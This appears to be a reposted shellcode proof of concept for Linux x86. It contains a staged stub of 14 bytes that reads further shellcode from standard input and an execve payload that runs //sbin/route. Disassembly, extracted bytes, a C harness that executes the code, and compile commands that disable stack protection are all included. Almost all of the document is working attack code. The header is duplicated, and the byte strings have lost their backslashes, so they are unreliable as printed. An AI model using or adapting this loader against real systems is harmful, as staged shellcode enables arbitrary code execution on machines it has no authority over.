/*
'''
; Date: 10/03/2019
; Staged-Execve-Route.asm
; Author: Daniele Votta
; Description: This program execute //sbin/route from staged (read input from STDIN /*
'''
; Date: 10/03/2019
; Staged-Execve-Route.asm
; Author: Daniele Votta
; Description: This program execute //sbin/route from staged (read input from STDIN) shellcode (14 bytes).
; Tested on: i686 GNU/Linux
'''
execve-stack-route: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: 31 c0 xor eax,eax
8048082: 50 push eax
8048083: 68 6f 75 74 65 push 0x6574756f
8048088: 68 69 6e 2f 72 push 0x722f6e69
804808d: 68 2f 2f 73 62 push 0x62732f2f
8048092: 89 e3 mov ebx,esp
8048094: 50 push eax
8048095: 89 e2 mov edx,esp
8048097: 53 push ebx
8048098: 89 e1 mov ecx,esp
804809a: b0 0b mov al,0xb
804809c: cd 80 int 0x80
[+] Extract Shellcode ...
"x31xc0x50x68x6fx75x74x65x68x69x6ex2fx72x68x2fx2fx73x62x89xe3x50x89xe2x53x89xe1xb0x0bxcdx80"
(30 bytes)
======================= POC Daniele Votta =======================
*/
#include<stdio.h>
#include<string.h>
/*
Compile: gcc -fno-stack-protector -z execstack -m32 shellcode.c -o shellcode
How to use: echo -ne "x31xc0x50x68x6fx75x74x65x68x69x6ex2fx72x68x2fx2fx73x62x89xe3x50x89xe2x53x89xe1xb0x0bxcdx80"|./shellcode
*/
/* Read Shellcode from STDIN (127 bytes | 0x7F) Execve //sbin/route (14 bytes) */
unsigned char code[] =
"x6Ax7Fx5Ax54x59x31xDBx6Ax03x58xCDx80x51xC3";
int main()
{
printf("Shellcode Length: %d
", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
Linux x86 sbin route Shellcode
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 295